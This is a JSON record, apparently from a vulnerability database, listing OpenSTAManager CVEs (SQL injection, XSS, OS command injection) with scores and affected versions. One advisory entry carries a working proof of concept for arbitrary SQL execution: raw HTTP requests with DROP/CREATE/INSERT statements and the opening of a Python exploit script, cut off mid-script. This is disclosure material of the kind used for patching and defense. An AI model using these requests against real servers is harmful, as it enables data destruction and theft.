"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-whv5-4q2f-q68g", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": 
"HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-03T19:52:40Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-whv5-4q2f-q68g" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29782", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29782" }, { "reference_url": "https://github.com/advisories/GHSA-whv5-4q2f-q68g", "reference_id": "GHSA-whv5-4q2f-q68g", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-whv5-4q2f-q68g" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110583?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.10.2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.10.2" } ], "aliases": [ "CVE-2026-29782", "GHSA-whv5-4q2f-q68g" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5tn6-au4e-33de" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50039?format=api", "vulnerability_id": "VCID-7e19-24d8-f7gd", "summary": "OpenSTAManager has a Time-Based Blind SQL Injection in Article Pricing Module\nCritical Time-Based Blind SQL Injection vulnerability in the article pricing module of OpenSTAManager v2.9.8 allows authenticated attackers to extract complete database contents including user credentials, customer data, and financial records through time-based 
Boolean inference attacks.\n\n**Status:** ✅ Confirmed and tested on live instance (v2.9.8) and [demo.osmbusiness.it](https://demo.osmbusiness.it/) (v2.9.7)\n**Vulnerable Parameter:** `idarticolo` (GET)\n**Affected Endpoint:** `/ajax_complete.php?op=getprezzi`\n**Affected Module:** Articoli (Articles/Products)", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24416", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02401", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02453", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02459", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03086", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24416" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24416", "reference_id": "CVE-2026-24416", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24416" }, { "reference_url": "https://github.com/advisories/GHSA-p864-fqgv-92q4", "reference_id": "GHSA-p864-fqgv-92q4", "reference_type": "", "scores": [ { "value": "HIGH", 
"scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-p864-fqgv-92q4" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-p864-fqgv-92q4", "reference_id": "GHSA-p864-fqgv-92q4", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-09T15:20:55Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-p864-fqgv-92q4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/958981?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.10-beta", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5srf-wjj5-z3fj" }, { "vulnerability": "VCID-5tn6-au4e-33de" }, { "vulnerability": "VCID-e7y7-21j6-k7hj" }, { "vulnerability": "VCID-nzzy-h46k-bfcr" }, { "vulnerability": "VCID-uq8m-y1hg-qbgx" }, { "vulnerability": "VCID-y85c-bbqe-r3bt" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.10-beta" } ], "aliases": [ "CVE-2026-24416", "GHSA-p864-fqgv-92q4" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7e19-24d8-f7gd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50526?format=api", "vulnerability_id": "VCID-7h5v-9rhe-2bbp", "summary": "OpenSTAManager Affected by XSS in modifica_iva.php via righe parameter\nMultiple Reflected Cross-Site Scripting (XSS) vulnerabilities in OpenSTAManager v2.9.8 allow unauthenticated attackers to execute arbitrary JavaScript 
code in the context of other users' browsers through crafted URL parameters, potentially leading to session hijacking, credential theft, and unauthorized actions.\n\n**Vulnerable Parameter:** `righe` (GET)", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24415", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05635", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.0558", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05622", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0002", "scoring_system": "epss", "scoring_elements": "0.05621", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24415" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24415", "reference_id": "CVE-2026-24415", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24415" }, { "reference_url": "https://github.com/advisories/GHSA-jfgp-g7x7-j25j", "reference_id": "GHSA-jfgp-g7x7-j25j", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": 
"https://github.com/advisories/GHSA-jfgp-g7x7-j25j" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-jfgp-g7x7-j25j", "reference_id": "GHSA-jfgp-g7x7-j25j", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-04T21:17:09Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-jfgp-g7x7-j25j" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/73823?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.9.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2br1-99zg-z7bh" }, { "vulnerability": "VCID-5srf-wjj5-z3fj" }, { "vulnerability": "VCID-5tn6-au4e-33de" }, { "vulnerability": "VCID-7e19-24d8-f7gd" }, { "vulnerability": "VCID-81kx-rj8c-dkbr" }, { "vulnerability": "VCID-8x62-3aff-hbak" }, { "vulnerability": "VCID-by14-5puv-qygm" }, { "vulnerability": "VCID-e7y7-21j6-k7hj" }, { "vulnerability": "VCID-gnx6-chzh-3fc3" }, { "vulnerability": "VCID-nv3t-9e16-8kbn" }, { "vulnerability": "VCID-nzzy-h46k-bfcr" }, { "vulnerability": "VCID-pxzr-bvsj-y3gs" }, { "vulnerability": "VCID-uq8m-y1hg-qbgx" }, { "vulnerability": "VCID-w4gk-vbbq-13ea" }, { "vulnerability": "VCID-y85c-bbqe-r3bt" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.9.8" } ], "aliases": [ "CVE-2026-24415", "GHSA-jfgp-g7x7-j25j" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7h5v-9rhe-2bbp" }, { "url": 
"http://public2.vulnerablecode.io/api/vulnerabilities/50048?format=api", "vulnerability_id": "VCID-81kx-rj8c-dkbr", "summary": "OpenSTAManager has a SQL Injection in the Prima Nota module\nCritical Error-Based SQL Injection vulnerability in the Prima Nota (Journal Entry) module of OpenSTAManager v2.9.8 allows authenticated attackers to extract complete database contents including user credentials, customer PII, and financial records through XML error messages by injecting malicious SQL into URL parameters.\n\n**Status:** ✅ Confirmed and tested on live instance (v2.9.8)\n**Vulnerable Parameters:** `id_documenti` (GET parameters)\n**Affected Endpoint:** `/modules/primanota/add.php`\n**Attack Type:** Error-Based SQL Injection (IN clause)", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24419", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02401", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02453", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02459", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03086", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24419" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24419", "reference_id": "CVE-2026-24419", "reference_type": "", "scores": [ { "value": "8.7", 
"scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24419" }, { "reference_url": "https://github.com/advisories/GHSA-4j2x-jh4m-fqv6", "reference_id": "GHSA-4j2x-jh4m-fqv6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4j2x-jh4m-fqv6" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4j2x-jh4m-fqv6", "reference_id": "GHSA-4j2x-jh4m-fqv6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-02-06T18:30:04Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4j2x-jh4m-fqv6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/958981?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.10-beta", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5srf-wjj5-z3fj" }, { "vulnerability": "VCID-5tn6-au4e-33de" }, { "vulnerability": "VCID-e7y7-21j6-k7hj" }, { "vulnerability": "VCID-nzzy-h46k-bfcr" }, { "vulnerability": "VCID-uq8m-y1hg-qbgx" }, { "vulnerability": "VCID-y85c-bbqe-r3bt" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.10-beta" } ], "aliases": [ "CVE-2026-24419", "GHSA-4j2x-jh4m-fqv6" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": 
"http://public2.vulnerablecode.io/vulnerabilities/VCID-81kx-rj8c-dkbr" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50056?format=api", "vulnerability_id": "VCID-8x62-3aff-hbak", "summary": "OpenSTAManager has an OS Command Injection in P7M File Processing\nA critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69212", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00133", "scoring_system": "epss", "scoring_elements": "0.32483", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00133", "scoring_system": "epss", "scoring_elements": "0.32412", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00133", "scoring_system": "epss", "scoring_elements": "0.32451", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00152", "scoring_system": "epss", "scoring_elements": "0.35628", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69212" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69212", "reference_id": "CVE-2025-69212", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], 
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69212" }, { "reference_url": "https://github.com/advisories/GHSA-25fp-8w8p-mx36", "reference_id": "GHSA-25fp-8w8p-mx36", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-25fp-8w8p-mx36" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36", "reference_id": "GHSA-25fp-8w8p-mx36", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-09T15:20:50Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/958981?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.10-beta", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5srf-wjj5-z3fj" }, { "vulnerability": "VCID-5tn6-au4e-33de" }, { "vulnerability": "VCID-e7y7-21j6-k7hj" }, { "vulnerability": "VCID-nzzy-h46k-bfcr" }, { "vulnerability": "VCID-uq8m-y1hg-qbgx" }, { "vulnerability": "VCID-y85c-bbqe-r3bt" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.10-beta" } ], "aliases": [ "CVE-2025-69212", "GHSA-25fp-8w8p-mx36" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8x62-3aff-hbak" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50052?format=api", "vulnerability_id": "VCID-by14-5puv-qygm", 
"summary": "OpenSTAManager has a SQL Injection in Scadenzario Print Template\nAn **authenticated SQL Injection vulnerability** in OpenSTAManager's Scadenzario (Payment Schedule) print template allows any authenticated user to extract sensitive data from the database, including admin credentials, customer information, and financial records. The vulnerability enables complete database read access through error-based SQL injection techniques.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69216", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02401", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02453", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02459", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03086", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69216" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69216", "reference_id": "CVE-2025-69216", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69216" }, { "reference_url": 
"https://github.com/advisories/GHSA-q6g3-fv43-m2w6", "reference_id": "GHSA-q6g3-fv43-m2w6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-q6g3-fv43-m2w6" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-q6g3-fv43-m2w6", "reference_id": "GHSA-q6g3-fv43-m2w6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-09T15:20:53Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-q6g3-fv43-m2w6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/958981?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.10-beta", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5srf-wjj5-z3fj" }, { "vulnerability": "VCID-5tn6-au4e-33de" }, { "vulnerability": "VCID-e7y7-21j6-k7hj" }, { "vulnerability": "VCID-nzzy-h46k-bfcr" }, { "vulnerability": "VCID-uq8m-y1hg-qbgx" }, { "vulnerability": "VCID-y85c-bbqe-r3bt" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.10-beta" } ], "aliases": [ "CVE-2025-69216", "GHSA-q6g3-fv43-m2w6" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-by14-5puv-qygm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90160?format=api", "vulnerability_id": "VCID-e7y7-21j6-k7hj", "summary": "OpenSTAManager: SQL Injection via Aggiornamenti Module\n## Description\n\nThe 
Aggiornamenti (Updates) module in OpenSTAManager <= 2.10.1 contains a database conflict resolution feature (`op=risolvi-conflitti-database`) that accepts a JSON array of SQL statements via POST and executes them directly against the database without any validation, allowlist, or sanitization.\n\nAn authenticated attacker with access to the Aggiornamenti module can execute arbitrary SQL statements including `CREATE`, `DROP`, `ALTER`, `INSERT`, `UPDATE`, `DELETE`, `SELECT INTO OUTFILE`, and any other SQL command supported by the MySQL server. Foreign key checks are explicitly disabled before execution (`SET FOREIGN_KEY_CHECKS=0`), further reducing database integrity protections.\n\n## Affected Code\n\n**File:** `modules/aggiornamenti/actions.php`, lines 40-82\n\n```php\ncase 'risolvi-conflitti-database':\n $queries_json = post('queries'); // Line 41: User input from POST\n // ...\n $queries = json_decode($queries_json, true); // Line 50: JSON decoded to array\n // ...\n $dbo->query('SET FOREIGN_KEY_CHECKS=0'); // Line 69: FK checks DISABLED\n\n $errors = [];\n $executed = 0;\n\n foreach ($queries as $query) {\n try {\n $dbo->query($query); // Line 76: DIRECT EXECUTION\n ++$executed;\n } catch (Exception $e) {\n $errors[] = $query.' - '.$e->getMessage(); // Line 79: Error details leaked\n }\n }\n $dbo->query('SET FOREIGN_KEY_CHECKS=1'); // Line 82: FK checks re-enabled\n```\n\n### Key Issues\n\n1. **No query validation:** The SQL statements from user input are executed directly via `$dbo->query()` without any validation or filtering.\n2. **No allowlist:** There is no restriction on which SQL commands are permitted (e.g., only `ALTER TABLE` or `CREATE INDEX`).\n3. **Foreign key checks disabled:** `SET FOREIGN_KEY_CHECKS=0` is executed before the user queries, allowing data integrity violations.\n4. **Error message leakage:** Exception messages containing database structure details are returned in the JSON response (line 79).\n5. 
**No authorization check:** The action only requires module-level access, with no additional authorization for this destructive operation.\n\n## Root Cause Analysis\n\n### Data Flow\n\n1. Attacker sends POST request to `/editor.php?id_module=<Aggiornamenti_ID>` with `op=risolvi-conflitti-database` and `queries=[\"<arbitrary SQL>\"]`\n2. `editor.php` includes `actions.php` (root), which checks module permission (`$structure->permission == 'rw'`) at line 472\n3. Root `actions.php` includes the module's `actions.php` at line 489\n4. `modules/aggiornamenti/actions.php` reads the `queries` POST parameter (line 41)\n5. JSON-decodes it into an array of strings (line 50)\n6. Iterates over each string and executes it as a SQL query via `$dbo->query()` (line 76)\n\n### Why This Is Exploitable\n\n- The feature is intended for resolving database schema conflicts during updates\n- However, there is no restriction on what SQL can be executed\n- Any authenticated user with `rw` permission on the Aggiornamenti module can exploit this\n- The default admin account always has access to this module\n\n## Proof of Concept\n\n### Prerequisites\n\n- A valid user account with access to the Aggiornamenti module\n\n### Step 1: Authenticate\n\n```\nPOST /index.php HTTP/1.1\nHost: <target>\nContent-Type: application/x-www-form-urlencoded\n\nop=login&username=<user>&password=<pass>\n```\n\nSave the `PHPSESSID` cookie.\n\n### Step 2: Detect Aggiornamenti Module ID\n\nNavigate to the application dashboard and inspect the sidebar links. The Aggiornamenti module URL contains `id_module=<ID>`. 
Default value in a standard installation: `6`.\n\n### Step 3: Execute Arbitrary SQL\n\n**Request (captured in Burp Suite):**\n\n```\nPOST /editor.php?id_module=6&id_record=6 HTTP/1.1\nHost: 127.0.0.1:8888\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\nAccept-Encoding: gzip, deflate, br\nAccept: */*\nConnection: keep-alive\nCookie: PHPSESSID=6a1a8ab261f8d93c6e21d2ee566c17a5\nContent-Type: application/x-www-form-urlencoded\n\nop=risolvi-conflitti-database&queries=%5B%22DROP+TABLE+IF+EXISTS+poc_vuln04_verify%22%2C+%22CREATE+TABLE+poc_vuln04_verify+%28id+INT+AUTO_INCREMENT+PRIMARY+KEY%2C+proof+VARCHAR%28255%29%2C+ts+TIMESTAMP+DEFAULT+CURRENT_TIMESTAMP%29%22%2C+%22INSERT+INTO+poc_vuln04_verify+%28proof%29+VALUES+%28%27CVE_PROOF_arbitrary_sql_execution%27%29%22%5D\n```\n\nThe URL-decoded `queries` parameter is:\n\n```json\n[\n \"DROP TABLE IF EXISTS poc_vuln04_verify\",\n \"CREATE TABLE poc_vuln04_verify (id INT AUTO_INCREMENT PRIMARY KEY, proof VARCHAR(255), ts TIMESTAMP DEFAULT CURRENT_TIMESTAMP)\",\n \"INSERT INTO poc_vuln04_verify (proof) VALUES ('CVE_PROOF_arbitrary_sql_execution')\"\n]\n```\n\nThree arbitrary SQL statements are sent: `DROP TABLE`, `CREATE TABLE`, and `INSERT INTO` — demonstrating full control over the database.\n\n**Response (captured in Burp Suite):**\n\nThe server responds with HTTP 200 and the following JSON response confirming successful execution of all 3 queries:\n\n```json\n{\"success\":true,\"message\":\"Tutte le query sono state eseguite con successo (3 query).<br><br>Query eseguite:<br>DROP TABLE IF EXISTS poc_vuln04_verify<br>CREATE TABLE poc_vuln04_verify (id INT AUTO_INCREMENT PRIMARY KEY, proof VARCHAR(255), ts TIMESTAMP DEFAULT CURRENT_TIMESTAMP)<br>INSERT INTO poc_vuln04_verify (proof) VALUES ('CVE_PROOF_arbitrary_sql_execution')\",\"flash_message\":true}\n```\n\n<img width=\"1490\" height=\"355\" alt=\"image\" 
src=\"https://github.com/user-attachments/assets/f0df5dd9-4ede-4503-8e00-58c47f2cd06a\" />\n\n\n### Step 4: Verify Execution\n\nThe table `poc_vuln04_verify` was created in the database with the inserted data, confirming that arbitrary SQL was executed. The server confirms: `\"Tutte le query sono state eseguite con successo (3 query).\"`\n\n### Observed Results\n\n| Action | Result |\n|---|---|\n| `DROP TABLE IF EXISTS` | Table dropped successfully |\n| `CREATE TABLE` | Table created successfully |\n| `INSERT INTO` | Data inserted |\n| `SELECT VERSION()` (via INSERT...SELECT) | MySQL version extracted: `8.3.0` |\n| Server confirmation | `\"success\":true` with query count |\n| Execution with admin user | Success |\n| Execution with non-admin user (Tecnici group with module access) | Success |\n\n### Exploit\n\n```\npython3 poc_sql.py -t http://<target>:8888 -u admin -p admin\n```\n\n```python\n#!/usr/bin/env python3\n\nimport argparse\nimport json\nimport re\nimport sys\nimport urllib3\n\nimport requests\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nDEFAULT_HEADERS = {\n \"User-Agent\": (\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) \"\n \"AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/120.0.0.0 Safari/537.36\"\n ),\n}\n\n\ndef parse_args():\n p = argparse.ArgumentParser(\n description=\"OpenSTAManager <= 2.10.1 — Arbitrary SQL Exec in Aggiornamenti (PoC)\",\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=(\n \"Examples:\\n\"\n \" %(prog)s -t http://target:8888 -u admin -p 